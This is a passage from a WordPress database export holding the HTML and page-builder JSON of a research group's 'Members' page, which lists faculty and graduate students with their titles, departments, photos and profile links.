26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c181-outer\">\n            <div data-colibri-id=\"182-c181\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c181 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c182\" class=\"d-block style-913 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c182-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c182-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-global-transition-all h-heading style-914 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c183\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"h-text h-text-component style-915 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c185\" class=\"style-917 style-local-182-c185 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-09-29 22:27:09','2023-09-30 02:27:09','',182,'https://gsudice.dataconn.net/?p=1626',0,'revision','',0),(1634,1,'2023-10-12 15:09:36','2023-10-12 19:09:36','','Hassan-Babaie-300x300','','inherit','open','closed','','hassan-babaie-300x300','','','2023-10-12 15:09:36','2023-10-12 19:09:36','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/10/Hassan-Babaie-300x300-1.jpg',0,'attachment','image/jpeg',0),(1637,1,'2023-10-12 15:14:37','2023-10-12 19:14:37','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Faculty\",\"attrs\":{\"id\":\"faculty\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c4\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c5\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-headshot.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":629,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c4\",\"index\":0,\"id\":\"182-c6\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Chetan Tiwari\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":2,\"id\":\"182-c7\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Director<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c8\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/chetan-tiwari\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=C5PVPkoAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c4\",\"index\":1,\"id\":\"182-c9\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c10\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c11\",\"partialId\":182,\"styleRef\":978,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-Portrait-1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1409,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c10\",\"index\":0,\"id\":\"182-c12\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Armin Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":2,\"id\":\"182-c13\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p> Chair and Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c14\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/armin-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=41ckZZsAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c10\",\"index\":1,\"id\":\"182-c15\",\"partialId\":182,\"styleRef\":979,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c16\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c17\",\"partialId\":182,\"styleRef\":980,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/sunderraman1.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":692,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c16\",\"index\":0,\"id\":\"182-c18\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Raj Sunderraman\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":2,\"id\":\"182-c19\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Chair and Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c20\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-SRM-360x360-1.png\",\"caption\":{\"text\":\"\"},\"imageId\":1601,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Taylor-shelton_300x300.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":705,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c195\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c196\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-Hassan-Babaie-300x300-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1636,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c195\",\"index\":0,\"id\":\"182-c197\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":2,\"id\":\"182-c198\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c195\",\"index\":1,\"id\":\"182-c199\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c195\",\"index\":1,\"id\":\"182-c200\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c60\",\"parentId\":\"182-c59\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c59\",\"parentId\":\"182-c58\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c58\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c63\",\"parentId\":\"182-c62\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c63\",\"index\":0,\"id\":\"182-c64\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-Sundos_Al_Subhi-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1592,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c63\",\"index\":0,\"id\":\"182-c65\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c63\",\"index\":2,\"id\":\"182-c66\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c63\",\"index\":3,\"id\":\"182-c67\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer 